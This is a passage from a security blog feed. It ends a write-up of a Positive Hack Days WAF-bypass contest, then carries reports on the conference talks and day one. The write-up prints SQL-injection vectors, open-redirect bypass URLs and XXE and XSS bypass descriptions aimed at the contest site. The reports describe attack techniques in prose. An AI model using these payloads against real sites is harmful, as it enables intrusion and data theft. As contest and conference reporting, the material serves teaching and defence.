href="http://4.bp.blogspot.com/-2vBs6_qiuMw/VW8OzG27_jI/AAAAAAAAFBE/Tw7qq_mkrw0/s1600/%25D0%25A1%25D0%25BD%25D0%25B8%25D0%25BC%25D0%25BE%25D0%25BA%2B%25D1%258D%25D0%25BA%25D1%2580%25D0%25B0%25D0%25BD%25D0%25B0%2B2015-06-03%2B%25D0%25B2%2B17.27.05.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="120" src="http://4.bp.blogspot.com/-2vBs6_qiuMw/VW8OzG27_jI/AAAAAAAAFBE/Tw7qq_mkrw0/s640/%25D0%25A1%25D0%25BD%25D0%25B8%25D0%25BC%25D0%25BE%25D0%25BA%2B%25D1%258D%25D0%25BA%25D1%2580%25D0%25B0%25D0%25BD%25D0%25B0%2B2015-06-03%2B%25D0%25B2%2B17.27.05.png" width="640" /></a></div>To bypass the check, you could substitute Content-Type with text/xml, and as a result the POST data were not processed as JSON (the check was disabled).<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-1gA9bvfWIPI/VW8O-qMQ8XI/AAAAAAAAFBM/ZhOJ7xJ3zws/s1600/%25D0%25A1%25D0%25BD%25D0%25B8%25D0%25BC%25D0%25BE%25D0%25BA%2B%25D1%258D%25D0%25BA%25D1%2580%25D0%25B0%25D0%25BD%25D0%25B0%2B2015-06-03%2B%25D0%25B2%2B17.27.53.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="74" src="http://1.bp.blogspot.com/-1gA9bvfWIPI/VW8O-qMQ8XI/AAAAAAAAFBM/ZhOJ7xJ3zws/s640/%25D0%25A1%25D0%25BD%25D0%25B8%25D0%25BC%25D0%25BE%25D0%25BA%2B%25D1%258D%25D0%25BA%25D1%2580%25D0%25B0%25D0%25BD%25D0%25B0%2B2015-06-03%2B%25D0%25B2%2B17.27.53.png" width="640" /></a></div><b><span style="font-size: large;">XSD validation</span></b><br /><br />The site had a form for searching tickets by forming XML and sending the request to the back end.<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-Hq4VDAYaKck/VW8QUuO5bPI/AAAAAAAAFBU/cprnJcbn-w0/s1600/%25D0%25A1%25D0%25BD%25D0%25B8%25D0%25BC%25D0%25BE%25D0%25BA%2B%25D1%258D%25D0%25BA%25D1%2580%25D0%25B0%25D0%25BD%25D0%25B0%2B2015-06-03%2B%25D0%25B2%2B17.29.20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="224" src="http://4.bp.blogspot.com/-Hq4VDAYaKck/VW8QUuO5bPI/AAAAAAAAFBU/cprnJcbn-w0/s640/%25D0%25A1%25D0%25BD%25D0%25B8%25D0%25BC%25D0%25BE%25D0%25BA%2B%25D1%258D%25D0%25BA%25D1%2580%25D0%25B0%25D0%25BD%25D0%25B0%2B2015-06-03%2B%25D0%25B2%2B17.29.20.png" width="640" /></a></div><pre style="background-color: white; border: 0px; font-size: 14px; line-height: 22.3999977111816px; outline: 0px; overflow-x: auto; overflow-y: hidden; padding: 0px; vertical-align: baseline; word-break: break-all;"><span style="background-color: transparent;">XSD was used for the XML request.</span></pre><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-2iHOQHneT_A/VW8QeJX9FUI/AAAAAAAAFBg/Z4q8U0B8pCs/s1600/%25D0%25A1%25D0%25BD%25D0%25B8%25D0%25BC%25D0%25BE%25D0%25BA%2B%25D1%258D%25D0%25BA%25D1%2580%25D0%25B0%25D0%25BD%25D0%25B0%2B2015-06-03%2B%25D0%25B2%2B17.34.14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="446" src="http://1.bp.blogspot.com/-2iHOQHneT_A/VW8QeJX9FUI/AAAAAAAAFBg/Z4q8U0B8pCs/s640/%25D0%25A1%25D0%25BD%25D0%25B8%25D0%25BC%25D0%25BE%25D0%25BA%2B%25D1%258D%25D0%25BA%25D1%2580%25D0%25B0%25D0%25BD%25D0%25B0%2B2015-06-03%2B%25D0%25B2%2B17.34.14.png" width="640" /></a></div>According to the schema, the id attribute should contain 35 characters. The attribute value was added into the SQL request without validation. Bypassing required a vector that meets XSD requirements.</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-gk15TkAOt2A/VW8Qsb18sYI/AAAAAAAAFBo/t6OPgHYDUGo/s1600/%25D0%25A1%25D0%25BD%25D0%25B8%25D0%25BC%25D0%25BE%25D0%25BA%2B%25D1%258D%25D0%25BA%25D1%2580%25D0%25B0%25D0%25BD%25D0%25B0%2B2015-06-03%2B%25D0%25B2%2B17.35.15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="104" src="http://4.bp.blogspot.com/-gk15TkAOt2A/VW8Qsb18sYI/AAAAAAAAFBo/t6OPgHYDUGo/s640/%25D0%25A1%25D0%25BD%25D0%25B8%25D0%25BC%25D0%25BE%25D0%25BA%2B%25D1%258D%25D0%25BA%25D1%2580%25D0%25B0%25D0%25BD%25D0%25B0%2B2015-06-03%2B%25D0%25B2%2B17.35.15.png" width="640" /></a></div><b><span style="font-size: large;">Open Redirect</span></b><br /><search id="');select box(flag) from flag--____"></search><br /><search id="');select flag::int from flag -- "></search><br /><br />The vulnerability was in the "to" parameter of the script redirect.php. The flag was sent to fragment portions of URL where the redirection was executed, i.e. it wasn't sent to the server end. To get the flag, you should send the bot to another site with a page that could retrieve the value from location.hash and send it to the logger.<br /><br />Bypassing options:<br /><br /><span style="font-family: Courier New, Courier, monospace;">http://choo-choo.phdays.com/redirect.php?to=phdays.com:asd@host.com</span><br /><span style="font-family: Courier New, Courier, monospace;">http://choo-choo.phdays.com/redirect.php?to=http://ahack.ru%23.phdays.com/</span><br /><span style="font-family: Courier New, Courier, monospace;">http://choo-choo.phdays.com/redirect.php to=http%3a//www.samincube.com%3f\..\\www.phdays.com</span><br /><br /><b><span style="font-size: large;">XML External Entities Injection</span></b><br /><br />The script that handled XML data was vulnerable to XXE. Bypassing required using of the external entity in the parameter entity:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-sQ4sccs6FGc/VW8Q-8v3YEI/AAAAAAAAFBw/S8a_RDAwubE/s1600/%25D0%25A1%25D0%25BD%25D0%25B8%25D0%25BC%25D0%25BE%25D0%25BA%2B%25D1%258D%25D0%25BA%25D1%2580%25D0%25B0%25D0%25BD%25D0%25B0%2B2015-06-03%2B%25D0%25B2%2B17.36.26.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="195" src="http://4.bp.blogspot.com/-sQ4sccs6FGc/VW8Q-8v3YEI/AAAAAAAAFBw/S8a_RDAwubE/s640/%25D0%25A1%25D0%25BD%25D0%25B8%25D0%25BC%25D0%25BE%25D0%25BA%2B%25D1%258D%25D0%25BA%25D1%2580%25D0%25B0%25D0%25BD%25D0%25B0%2B2015-06-03%2B%25D0%25B2%2B17.36.26.png" width="640" /></a></div>It was also possible to bypass it with UTF-16.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-LcWPs4R7w5o/VW8RHgzt8eI/AAAAAAAAFB4/yVztcwyGook/s1600/%25D0%25A1%25D0%25BD%25D0%25B8%25D0%25BC%25D0%25BE%25D0%25BA%2B%25D1%258D%25D0%25BA%25D1%2580%25D0%25B0%25D0%25BD%25D0%25B0%2B2015-06-03%2B%25D0%25B2%2B17.37.03.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="52" src="http://2.bp.blogspot.com/-LcWPs4R7w5o/VW8RHgzt8eI/AAAAAAAAFB4/yVztcwyGook/s640/%25D0%25A1%25D0%25BD%25D0%25B8%25D0%25BC%25D0%25BE%25D0%25BA%2B%25D1%258D%25D0%25BA%25D1%2580%25D0%25B0%25D0%25BD%25D0%25B0%2B2015-06-03%2B%25D0%25B2%2B17.37.03.png" width="640" /></a></div><b><span style="font-size: large;">Cross-Site Scripting</span></b><br /><br />The vulnerability was in the site's search page. To obtain the flag, you could send the bot's cookies to the site. Bypassing required using non-standard tag attributes that are processed by bootstrap-validator allowing executing the JS code:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-RMi_fwXvlak/VW8RS0OOJpI/AAAAAAAAFCA/rvQJ1842_UI/s1600/%25D0%25A1%25D0%25BD%25D0%25B8%25D0%25BC%25D0%25BE%25D0%25BA%2B%25D1%258D%25D0%25BA%25D1%2580%25D0%25B0%25D0%25BD%25D0%25B0%2B2015-06-03%2B%25D0%25B2%2B17.37.43.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="26" src="http://1.bp.blogspot.com/-RMi_fwXvlak/VW8RS0OOJpI/AAAAAAAAFCA/rvQJ1842_UI/s640/%25D0%25A1%25D0%25BD%25D0%25B8%25D0%25BC%25D0%25BE%25D0%25BA%2B%25D1%258D%25D0%25BA%25D1%2580%25D0%25B0%25D0%25BD%25D0%25B0%2B2015-06-03%2B%25D0%25B2%2B17.37.43.png" width="640" /></a></div>Or:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-B7vhZLMSPRA/VW8RbTU_kxI/AAAAAAAAFCI/UZaKtVpWq-s/s1600/%25D0%25A1%25D0%25BD%25D0%25B8%25D0%25BC%25D0%25BE%25D0%25BA%2B%25D1%258D%25D0%25BA%25D1%2580%25D0%25B0%25D0%25BD%25D0%25B0%2B2015-06-03%2B%25D0%25B2%2B17.38.22.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="44" src="http://3.bp.blogspot.com/-B7vhZLMSPRA/VW8RbTU_kxI/AAAAAAAAFCI/UZaKtVpWq-s/s640/%25D0%25A1%25D0%25BD%25D0%25B8%25D0%25BC%25D0%25BE%25D0%25BA%2B%25D1%258D%25D0%25BA%25D1%2580%25D0%25B0%25D0%25BD%25D0%25B0%2B2015-06-03%2B%25D0%25B2%2B17.38.22.png" width="640" /></a></div><br /><b><span style="font-size: large;">Results</span></b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-ids5sCUPJNw/VW8RnKlhywI/AAAAAAAAFCQ/FATm7eqBdKg/s1600/waf3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="314" src="http://3.bp.blogspot.com/-ids5sCUPJNw/VW8RnKlhywI/AAAAAAAAFCQ/FATm7eqBdKg/s640/waf3.png" width="640" /></a></div><br />The winner of the contest is bushwhackers: Georgy Noseevich, Andrey Petukhov, and Alexander Razdobarov. The team solved all the tasks during the first day! (They won the last year's competition as well.) Mikhail Stepankin (ArtSploit) took second place, Eldar Zaitov (kyprizel) was the third. The winner received an iPad Air 2; a Sony Xperia Z3 went to the second place team; the third place team received a license for Burp Suite Professional.<br /><br />During the contest, <b>271,390 </b>requests were blocked (twice as many as during the last year's contest). This time, <b>302</b> contestants registered (compared to 101 last year). Only <b>18 participants</b> managed to capture at least one flag.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/--62KXZVzf9I/VW8RyVn3jHI/AAAAAAAAFCY/2kUtlWn7mJw/s1600/waf4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="474" src="http://1.bp.blogspot.com/--62KXZVzf9I/VW8RyVn3jHI/AAAAAAAAFCY/2kUtlWn7mJw/s640/waf4.png" width="640" /></a></div><br /><br />Thanks to everyone who took part in the contest.<br /><br /></div>Unknownnoreply@blogger.com597tag:blogger.com,1999:blog-5176771794789502609.post-49408747316673187762015-06-02T19:27:00.000+03:002015-07-03T13:54:37.341+03:00PHDays V Highlights: Signs of GSM Interception, High Time to Hack Wi-Fi, Future of Encryption<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-UJIcmg97seA/VW3Tpu9CGRI/AAAAAAAAE-k/Iz6lm4esvEQ/s1600/phd2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="426" src="http://3.bp.blogspot.com/-UJIcmg97seA/VW3Tpu9CGRI/AAAAAAAAE-k/Iz6lm4esvEQ/s640/phd2.png" width="640" /></a></div><br />Technological singularity is expected in 15 years at best, but Positive Hack Days transition is happening right now. The fifth forum had a record attendance – over 3,500 visitors, which is comparable to the leading international hacker conferences, and the number of talks, sessions, and various activities surpassed one hundred. The incredible and exciting contests involved hacking spaceships, power plants, ATMs, and railway companies. More Smoked Leet Chicken became the winning champion of this year’s CTF, showing their best at stock exchange speculation. Congratulations! A detailed write-up about that is coming soon. Right now let’s focus on a number of recommendations and tips that impressed us most of all during the 2-day hacker marathon that took place in World Trade Center on May 26-27.<br /><a name='more'></a><br /><b><span style="font-size: large;">Color of the Day vs Social Engineering</span></b><br /><br />Chris Hadnagy, the founder of <i>social-engineer.org</i>, talked about his experience in business protection against social hackers during his speech called “Social Engineering for Fun and Profit”. One of his stories was about a pregnant girl, a social engineer by profession, who carrying a heavy box managed to get inside an office protected by various identification systems and penetrated its most critical part — a server room. Pregnant women look so vulnerable, don't they? <br /><br />He also pointed out that while techniques change, people remain the same and there is no need to fight the very essence of human nature and become heartless robots. Instead, he showed how to turn it against social hackers. One of the ways is to implement the Color of the Day routine so the color would be known to employees only. When an adversary attempts to conduct a vishing attack pretending an IT or HR specialist, you just need to ask him or her the color of the day as a certain password to ward off impostors. You use ID cards to enter your office and it is all right to implement similar IDs for all access points. <br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-uXzpc__b094/VW3T1zzId8I/AAAAAAAAE-s/7X3e1KUA768/s1600/phd3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="368" src="http://1.bp.blogspot.com/-uXzpc__b094/VW3T1zzId8I/AAAAAAAAE-s/7X3e1KUA768/s640/phd3.png" width="640" /></a></div><br /><b><span style="font-size: large;">Find Out Someone Is Listening on Your Phone </span></b><br /><br />During his talk called “GSM Signal Interception Protection”, Sergey Kharkov described signs of wiretapping and all sorts of hardware and software diagnostic tools. For example, in order to make a connection, an attacker needs to make your device connect to his or her virtual cell, otherwise a phone might find a better alternative. So one of the sure signs that your device got connected to an adversary’s virtual cell is a strong signal and an unnaturally high C2 value responsible for prioritizing one cell over another.<br /><br />PHDays V participants gave a lot of attention to mobile security. Dmitry Kurbatov, Positive Technologies expert, held a hands-on lab, after which anyone was able to participate in the MiTM Mobile contest and try to hack a mobile operator created for the contest. Participants could do a lot of things like intercepting SMS, USSD, and phone conversations, working with IMSI catcher, hacking encryption keys using kraken, and duplicating cell phones. Write-up of the contest highlights is coming soon.<br /><br /><b><span style="font-size: large;">Why Hackers Attack the Olympics</span></b><br /><br />Among the participants of a round table dedicated to incident investigation in large infrastructures were Vladimir Kropotov, Fyodor Yarochkin, Kevin Williams, John Bambenek, and other infrastructure protection experts. For instance, Kevin as a British NCCU employee helped to protect the Olympic Games in London, while Vladimir represented Positive Technologies, which helped to protect VGTRK, a state television and radio broadcasting company in Russia, during the Olympics ’14. Fyodor Yarochkin noted that along with usual threats like hacktivists and hooligans came the most dangerous type of adversary — various forms of criminal business related to totalizators, as any change might help them to hit the jackpot. Kevin Williams discussed in detail the common practice in the UK to coordinate efforts with CERT, which act as a mediator between state departments and companies.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-7VF9TCiuTVs/VW3UC920rzI/AAAAAAAAE-0/33kLzgRi6k8/s1600/phd5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="334" src="http://4.bp.blogspot.com/-7VF9TCiuTVs/VW3UC920rzI/AAAAAAAAE-0/33kLzgRi6k8/s640/phd5.png" width="640" /></a></div><br /><b><span style="font-size: large;">How to Help Intrusion Prevention Systems</span></b><br /><br />Hackers have learned how to confuse self-learning mechanisms in the network intrusion detection systems. Clarence Chio, an artificial intelligence specialist, reviewed several models applied throughout IPS based on PSA, clusterization, etc. Which is better — rule-based techniques or machine self-learning mechanisms? Clarence Chio believes that ML techniques look good in theory, but when it comes to real life action they fail to impress.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-BoxMzGb24EM/VW3UKCkrO0I/AAAAAAAAE-8/l_BWyeQ-FMc/s1600/phd6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="362" src="http://2.bp.blogspot.com/-BoxMzGb24EM/VW3UKCkrO0I/AAAAAAAAE-8/l_BWyeQ-FMc/s640/phd6.png" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-GfdfbQhgnng/VW3UNrTjXXI/AAAAAAAAE_E/jgf9dzAKf7o/s1600/phd7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="408" src="http://1.bp.blogspot.com/-GfdfbQhgnng/VW3UNrTjXXI/AAAAAAAAE_E/jgf9dzAKf7o/s640/phd7.png" width="640" /></a></div><br /><br /><b><span style="font-size: large;">The Most Secure Mobile Platform Around</span></b><br /><br />The information security experts Denis Gorchakov and Nikolay Goncharov shared, among other things, information about the most secure mobile OS in their report called “Fighting Payment Fraud Within Mobile Networks”. The first place went to Windows Phone, for which any critical epidemics haven't been registered yet. As for iOS, there is a number of applications that attack devices with or without JailBreak. Android being the most popular mobile OS turned out the worst. According to Android Security Report 2015, the rate of malicious software found is 3 to 4 times above the average in Russia.<br /><br /><b><span style="font-size: large;">Edward Snowden in Your Keyboard </span></b><br /><br />Not only may wireless keyboards discharge when you least expect it, they also have a potential to disclose your confidential data. Andrey Biryukov, a system architect for MAYKOR, told us about the concept of keysweeper — a simple Adruino-based device in a shape of a charger that hijacks signals from keys pressed on a wireless keyboard and sends the data to an attacker. Usual computer scanning will help you to detect viruses and vulnerabilities on your PC, yet it fails to protect against keysweeper. <br /> <br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-M9CSmj6_Qc8/VW3UZc5DFqI/AAAAAAAAE_M/0wrbsAI_8e4/s1600/phd9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="342" src="http://2.bp.blogspot.com/-M9CSmj6_Qc8/VW3UZc5DFqI/AAAAAAAAE_M/0wrbsAI_8e4/s640/phd9.png" width="640" /></a></div><br /><b><span style="font-size: large;">Victim’s Browser as a Scanning Tool</span></b><br /><br />Dmitry Boomov, a respected deanonimization specialist, told the audience how to scan internal infrastructures via a victim’s browser without using JavaScript during his report called “Not by Nmap Alone”. All you need is to make a victim click on the right link.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-AH_DtUAtEDQ/VW3Vk2vBv-I/AAAAAAAAE_Y/kfpP_rmkGmw/s1600/phd10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="406" src="http://1.bp.blogspot.com/-AH_DtUAtEDQ/VW3Vk2vBv-I/AAAAAAAAE_Y/kfpP_rmkGmw/s640/phd10.png" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-RFwDsYkB6-w/VW3XoYygd1I/AAAAAAAAE_k/5lfYzGDuSfI/s1600/phd11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="432" src="http://4.bp.blogspot.com/-RFwDsYkB6-w/VW3XoYygd1I/AAAAAAAAE_k/5lfYzGDuSfI/s640/phd11.png" width="640" /></a></div><br /><b><span style="font-size: large;">Best Time to Catch Wi-Fi</span></b><br /><br />In his report “Overview of Little-Known Wi-Fi Nuances”, the researcher Oleg Kupreev brought our attention to time and weather conditions most comfortable for hackers to strike. A high-frequency signal is weaker on rainy days, so a potential attacker will most definitely choose another day to attack thousands of users near the subway. It makes more sense to go on a DDoS hunt on WTS via mdk3 deep in the night. Not only it’s inconvenient to attempt it in the evening (the only channels that do not cross are 1, 6, 11), but also quite reckless – traffic overload every five minutes may raise suspicions if a victim watches TV online. Mornings, when office PCs are turned on, are high time to crack WAP Enterprise.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-fHC8hxooEYo/VW3Xt763p8I/AAAAAAAAE_s/yg6S68QSrDM/s1600/phd12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="316" src="http://2.bp.blogspot.com/-fHC8hxooEYo/VW3Xt763p8I/AAAAAAAAE_s/yg6S68QSrDM/s640/phd12.png" width="640" /></a></div><br /><b><span style="font-size: large;"> How to Make Vendors Patch Vulnerabilities</span></b><br /><br />In March, FSTEC of Russia made its official vulnerability database, comprised of more than 150 threats and 10,000 vulnerabilities, public. Vitaly Lyutikov, the head of FSTEC of Russia, mentioned during the round table called "Expert Community's Role in Generation of Information Security Threat Databases" that the national database was a result of a law prohibiting Russian documents from referring to third-party CVE definitions. FSTEC of Russia is now responsible for checking zero-day vulnerabilities and vendor correspondence.<br /><br /><b><span style="font-size: large;">Onion Vulnerabilities</span></b><br /><br />Protecting onion resources on DarkNet is not that easy. The Kaspersky Lab's experts, Denis Makrushin and Maria Garnaeva, told us what kind of information external users may get on a Tor user. Denis developed a passive system for Exit node traffic collection which had a key quality — it transferred traffic throughout the ports and contained a sniffer that was able to catch out all HTTP connections with the Referer header. If a person inside Tor clicks a link to an external web resource, this packet gets captured. The discovered sites usually contained ads about passwords and legacy databases. The authors of "The End of Anonymity on Anonymous Networks" also found out that every third onion resource has security flaws and allows for arbitrary JavaScript code execution.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-PfCLTrO5Ccw/VW3X2q_VeWI/AAAAAAAAE_0/ZXkCpSATJrI/s1600/phd13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="354" src="http://1.bp.blogspot.com/-PfCLTrO5Ccw/VW3X2q_VeWI/AAAAAAAAE_0/ZXkCpSATJrI/s640/phd13.png" width="640" /></a></div><br /><b><span style="font-size: large;">Hunting Lost Configuration Files</span></b><br /><br />Hardly would anyone draw your attention for as long as Andrey Masalovich, the faithful participant of Positive Hack Days — in an hour the audience just couldn't stop listening to the competitive intelligence expert, so we had to extend the time of his talk "Zero Shades of Grey". Having shared one of his relatively honest ways to access website logins, passwords, and bases (figuring out the name of the backup copy of a CMS configuration file forgotten by a system administrator), he focused on a very important topic — doubting authenticity of multimedia, graphic and text data. <br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-N1PWhw8J_aA/VW3YCg0f7iI/AAAAAAAAE_8/3peh7xPJeHY/s1600/phd16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="350" src="http://1.bp.blogspot.com/-N1PWhw8J_aA/VW3YCg0f7iI/AAAAAAAAE_8/3peh7xPJeHY/s640/phd16.png" width="640" /></a></div><br /><b><span style="font-size: large;">Check If Photos are Photoshopped</span></b><br /><br />The contest held by Almaz Capital for startup cybersecurity projects touched upon data authenticity as well. In no rush for establishing a company, participants needed to provide a prototype of their solution.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-PLNGimuI9H0/VW3YK9lvu4I/AAAAAAAAFAE/JY7hxvh0rEE/s1600/phd17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="364" src="http://4.bp.blogspot.com/-PLNGimuI9H0/VW3YK9lvu4I/AAAAAAAAFAE/JY7hxvh0rEE/s640/phd17.png" width="640" /></a></div><br />The first prize (1,500,000 rubles) went to <a href="http://www.smtdp.com/" target="_blank">SMTDP Tech</a>, a company that invented an anti-photoshop to detect photo and video changes. If you need to check a static billboard or car accident photos, this software may help. <br /><br /><b><span style="font-size: large;">Future of Encryption</span></b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-qU5IDvZ1xQU/VW3YWtt7OnI/AAAAAAAAFAM/uYomdrB76bs/s1600/phd18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="380" src="http://2.bp.blogspot.com/-qU5IDvZ1xQU/VW3YWtt7OnI/AAAAAAAAFAM/uYomdrB76bs/s640/phd18.png" width="640" /></a></div><br />Whitfield Diffie, the advisor for Almaz Capital, the father of digital signatures and asymmetric encryption made his forecast from PHDays plasma displays on May 26. He believes that if we were spending as much money on actual defense as we are spending on interactive attack systems we might get much better results, build digital fortresses and level up information security. Today quantum key distribution shows great promise for solving transportation problems, but nobody knows exactly how it'll look like. We can only assume that radio or vibro communication will be implemented. Another debated technology taken skeptically by Whitfield Diffie is homomorphic encryption — a user's computer might not be powerful enough to decrypt a message.<br /><br /><b><span style="font-size: large;">Linguists to Come Out of the Shadow</span></b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-vNqwEql4sG0/VW3Yht_0Y2I/AAAAAAAAFAU/feDy3Mq6QeA/s1600/phd19.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="332" src="http://3.bp.blogspot.com/-vNqwEql4sG0/VW3Yht_0Y2I/AAAAAAAAFAU/feDy3Mq6QeA/s640/phd19.png" width="640" /></a></div><br />The session "<a href="http://www.phdays.com/program/business/40912/" target="_blank">Information Security: Careers of the Future</a>", its moderator and Positive Technologies expert Evgeny Minkovsky along with business and government officers tried to foresee our future as well. What information security jobs and technologies will be most popular in five or fifteen years? Voting results at the end of the meeting surprised the participants — sooner or later information security will show high demand for linguists. Meanwhile, this point of view corresponds to the Atlas on New Professions by Agency for Strategic Initiatives that placed digital linguistics among the most promising professions. These specialists will develop semantic translation and text processing systems and new communication interfaces between PCs and human beings.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/--G4qZhRTnZM/VW3YqvWq6gI/AAAAAAAAFAc/I8zqyC77DJM/s1600/phd20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="426" src="http://2.bp.blogspot.com/--G4qZhRTnZM/VW3YqvWq6gI/AAAAAAAAFAc/I8zqyC77DJM/s640/phd20.png" width="640" /></a></div><br />You may find videos of all the PHDays reports at the forum’s site <a href="http://www.phdays.com/broadcast/">http://www.phdays.com/broadcast/</a>.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-z4_7bAqEehE/VW3Y8Q_mlFI/AAAAAAAAFAk/Qs-dpGrccU4/s1600/phd21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="426" src="http://3.bp.blogspot.com/-z4_7bAqEehE/VW3Y8Q_mlFI/AAAAAAAAFAk/Qs-dpGrccU4/s640/phd21.png" width="640" /></a></div></div>Unknownnoreply@blogger.com203tag:blogger.com,1999:blog-5176771794789502609.post-70862623231670123392015-05-29T10:36:00.000+03:002015-05-29T10:36:10.195+03:00PHDays V. Day First: How to Intercept SMS and Hack Satellite<div dir="ltr" style="text-align: left;" trbidi="on">Positive Hack Days launched on May 26, and on the very first day, cybersecurity experts demonstrated various techniques that are used to hack ATMs, online banking systems, mobile carriers' networks, energy, transport, and industrial companies. More than 50 reports were presented at the Word Trade Center. A number of hands-on labs, round tables were held as well. The organizer provided several video streams to broadcast the most interesting events on the forum's website.<br /><br />Damage caused by a cyberattack can be measured in billions of dollars, while its actual cost is rather low. According to the Positive Research center, anyone with less than 10,000 dollars is able to gain remote access to somebody else's SIM card, which means access to the subscriber's traffic, SMS, calls and location data. Twenty percent of SIM cards are vulnerable to such attacks. It is also possible to obtain a subscriber's confidential information by attacking his mobile carrier's equipment. An attack on a GSM cell can cost about 1,000 dollars. To hack a base station, an intruder might need only a PC and access to the SS7 network.<br /><a name='more'></a><br />Banking systems keep pace with the telecommunications sector. An ATM can hold 10 million rubles. And when it comes to hacking the cash machine, you might only need a Raspberry Pi for $60. Last year, Russia took second place in the world (after Palestine) for the quantity of ATMs that can be detected by special search engines and remotely reprogrammed by using insecure protocols and exploiting numerous vulnerabilities in Windows XP. The situation with e-money is not much better.<br /><br />In 2014, 70% of Android applications and 50% iOS apps contained vulnerabilities that gave access to an e-money account.<br /><br />Devices that seem harmless at first sight, such as wireless USB modems, can also constitute a danger to users. Mobile operating system developers are slick at fixing vulnerabilities, while modem firmware developers haven't paid much attention to security until recently. According to Positive Technologies researchers, 27 out of 30 firmwares contained critical vulnerabilities. Timur Yunusov presented a report, which reveals how easy it is for an intruder to enable automatic identification and infection of 4G modems in order to intercept traffic, manipulate an account and SMS, break into a computer connected to such a modem.<br /><br />The philosophical conception of PHDays V involved certain elements of cosmological theories. However, practical aspects were as well in the range of interest, which is why the forum's organizer held the session named Amateur Radio for Space Communication. Speakers discussed information security of space stations; in particular, they discussed the Fobos-Grunt crash considering a version based on external influence. The radio amateur Dmitry Pashkov claims that it is quite possible to jam signals between a control center and a spacecraft¬. You will find the necessary equipment in any electronics store. Except for an antenna— you'll have to make it by yourself. By using homemade devices, Dmitry managed to obtain solar eclipse images from Meteor-M No. 2 (a Roscosmos satellite) and to get the most up-to-date weather forecast.<br /><br /><b><span style="font-size: large;">How to Protect</span></b><br /><br />A more effective fight against vulnerabilities in information systems and measures for protection of national interests have been discussed at the most "governmental" section — Today's Russia in Unfriendly Cyberworld.<br /><br />Dmitry Finogenov (FSB department #8), Alexander Radovitsky (RF Ministry of Foreign Affairs), Alexander Baranov (Federal Tax Service), Vadim Dengin, Andrey Tumanov, and Ilya Kostunov (deputies of the State Duma) took part in the discussion. Alexey Andreev (Positive Technologies) and Alexey Lukatsky (Cisco) were speaking on the part of the expert community.<br /><br />The government officials promised that a new Russian IS concept would have been published by the end of 2015. Vadim Dengin urged Russian Internet users (over 70 million people at the moment) to always be responsible for their words (in 